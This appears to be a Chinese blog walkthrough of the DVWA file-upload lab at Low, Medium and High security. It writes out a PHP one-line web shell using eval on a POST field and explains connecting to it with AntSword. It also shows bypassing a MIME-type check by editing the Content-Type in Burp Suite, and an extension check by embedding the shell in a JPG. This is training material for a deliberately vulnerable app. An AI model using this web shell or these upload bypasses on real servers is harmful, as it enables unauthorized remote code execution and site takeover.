DVWA文件上传漏洞实现详细操作

Low等级下的上传漏洞没有检测,可以直接上传.php文件

php文件里面写的是一句话木马<?php @eval($_POST[root]);?>

将你的上传路径粘贴到地址栏并回车

将url复制并在蚁剑中链接,获取web权限,Low级通过

把我们在Low级上传的php文件删除,开始medium

medium下后端检查的是文件类型,如果文件类型为image/jpeg即可通过

首先设置浏览器代理模式,我这里用的是火狐

先将我们的一句话木马文件准备好但不上传

将我们得Burp Suite代理开启(intercept is on 代表开启,on变成off代表关闭)

Burp Suite Pro我是在这下的

博主写的很详细,大家跟着下就可以

开启burp suite代理后我们点击上传(这里我遇到了小插曲,我刚开始是用127.0.0.1/dvwa进行的漏洞渗透,但是点击上传的时候burp suite抓不到包,看大佬们说用本机的ip可以,所以我就改成了本机ip168.192.***.***/dvwa,确实能够抓到包了)

抓到的包

红线处的类型我们改为image/jpeg

点击forward即可上传成功

继续之前的操作,将上传的php文件的url复制到中国蚁剑(代理没关的一直按forward就可以进入新的网页了)

接下来是high级别

查看源码可以知道这次的条件是文件名以jpg或jpeg结尾

之前的抓包修改类型在这里是不可用的,也不可以上传php文件,在burp suite中直接将文件名后缀添加上jpg,这里需用到一句话图片木马

准备一张后缀名为jpg的正常图片,还有我们之前的php一句话木马文件

通过Windows的dos窗口将两文件合并(我是将图片放桌面了,就按照在桌面的方式合并了)

现在直接上传就行

因为中国蚁剑是无法解析jpg文件的,所以这次我们要找到图片的存储路径来给到中国蚁剑

把我们上传成功后的网址改为第二张图片的网址

此时测试链接是无法连接的,是因为中国蚁剑不会携带cookie,我们先添加

添加后我们右击浏览网站来添加cookie

把左上角url那里改为dvwa首页回车

进来后dvwa安全级别默认是impossible,我们改为high

改完以后就有了high级别cookie,一定要点一下保存,我第一遍没点仍旧连不上

回到首页就可以链接上了,到dvwa/www/hackable/uploads下就能看到attack.jpg文件了

经验分享 程序员 微信小程序 职场和发展